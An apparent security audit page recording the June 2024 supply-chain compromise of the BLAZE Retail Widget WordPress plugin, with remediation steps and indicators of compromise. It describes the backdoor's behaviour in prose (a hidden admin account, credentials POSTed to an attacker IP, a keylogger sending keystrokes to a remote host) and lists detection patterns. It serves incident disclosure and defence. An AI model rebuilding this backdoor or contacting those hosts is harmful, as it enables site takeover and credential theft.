WP Beacon

← All audits

Audit #19 Cleaned

BLAZE Retail Widget Closed on WP.org · — installs · baseline trunk@r2268077 → head trunk@r3106494 · suspect committer blazeretail · by beacon-scan-skill (backfill from Wordfence 2024-06-24 advisory) · closed 1y ago

Actor: June 2024 wp.org credential-stuffing wave (operator unattributed)
Show full summary

Confirmed malicious supply-chain compromise — 30 commits in a 28-hour burst. Between 2024-06-21 23:21 UTC and 2024-06-24 03:50 UTC the legitimate blazeretail SVN account was used to push 30 commits (all with the message Upgrade) into the blaze-widget trunk, after a 4-year dormant period (last prior commit was 2020-03-26). The wp.org Plugin Review Team (frantorres) reverted the changes at r3106791 + r3106796 on 2024-06-24 and closed the plugin the same day with reason security-issue. Tags 2.5.3 and 2.5.4 visible in SVN today are PRT-authored cleanup tags (NOT malicious) — they contain a public incident notice plus an init-action handler that auto-invalidates the password of any backdoor admin account it finds (PluginAUTH, PluginGuest, Options). Payload is the canonical June 2024 backdoor: PHP admin_init handler that walks parent directories for wp-config.php, opens a direct mysqli connection, inserts an admin user PluginAUTH (email <username>@example.com, password 13 chars), POSTs the credentials as JSON to https://94.156.79.8/AddSites, and then performs cross-CMS recon (PrestaShop / Drupal / Symfony detection) reporting hits to /CMSUsers. Plus the JS-side keylogger via add_footer_script — hex-escaped eval(" ...") loading https://94.156.79.8/sc-top.js and POSTing every keystroke to https://hostpdf.co/pinche.php with cookie xcnmo-offsetgxc. Identical payload to social-warfare 4.4.7.1 (audit #14) including the distinctive pachamama() and zbvalidate_file() function names.

Cleanup published — updates flowing through wp.org again

The plugin has been remediated. This audit is retained as a public record of the incident and the IOCs.

If you run blaze-widget on your site

Verify your install matches the wp.org canonical version:

wp plugin verify-checksums blaze-widget

A patched build isn't yet published for this audit. Check the security advisories index or remove the plugin until one is available.

Or remove the plugin entirely:

wp plugin deactivate blaze-widget
wp plugin delete blaze-widget

If you're the plugin author

Cleanup steps to clear this label have not yet been documented for this audit. Contact the investigator listed above.

✓ Cleanup confirmed and audit closed.

Plugins under the same committer's SVN access

blazeretail holds push access to 2 plugins totalling — active installs. Each non-target plugin scans clean today but represents a one-commit hijack opportunity.

BLAZE Retail Widget — patched / closed audit
BLAZE Retail WooCommerce — closed by wp.org

IOCs extracted (8)

Kind Value Confidence
changelog_phrase Upgrade low
code_pattern eval(" medium
code_pattern get_woocommerce_user_count high
code_pattern getWPUsers high
code_pattern passwordz high
code_pattern PluginGuest high
code_pattern PRT_incidence_response_230624 medium
code_pattern zbvalidate_file high
Report body is empty.

Everything in this audit is reproducible from the links cited above: SVN log, RDAP records, GitHub repositories, wp.org forum threads, and any live endpoints. Full WP Beacon scan logs and any associated zip artifacts are available on request from the investigator.